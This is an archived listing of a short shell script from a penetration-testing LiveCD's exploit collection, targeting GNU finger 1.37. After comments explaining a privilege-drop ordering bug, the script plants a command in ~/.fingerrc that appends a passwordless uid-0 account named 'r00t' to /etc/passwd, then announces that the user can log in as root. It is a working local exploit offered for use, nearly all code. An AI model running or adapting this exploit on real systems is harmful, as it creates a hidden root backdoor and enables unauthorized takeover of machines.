home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / finger / fingerrc.sh < prev    next >
Linux/UNIX/POSIX Shell Script  |  2005-02-12  |  595b  |  20 lines
  1. #!/bin/sh
  2. #
  3. #   Systems running GNU in.fingerd(8) 1.37.
  4. #
  5. # There is a bug in  the `lib/site/userinfo.c'
  6. # module of GNU  finger version 1.37 allowing
  7. # any user on  a system to  execute arbitrary
  8. # commands with gid root from  ~/.fingerrc.
  9. # The problem is that  GNU finger  *first*
  10. # changes   its  userid  thus   giving  away
  11. # root privileges and *then* tries to change
  12. # its gid which will not succeed.
  13. #
  14. #             ..2 second code by gov-boi
  15.  
  16. cat << _EOF_ >> ~/.fingerrc
  17. echo "r00t::0:0::/root:/bin/sh" >> /etc/passwd
  18. _EOF_
  19. echo "you may now login as r00t - gov-boi"
  20.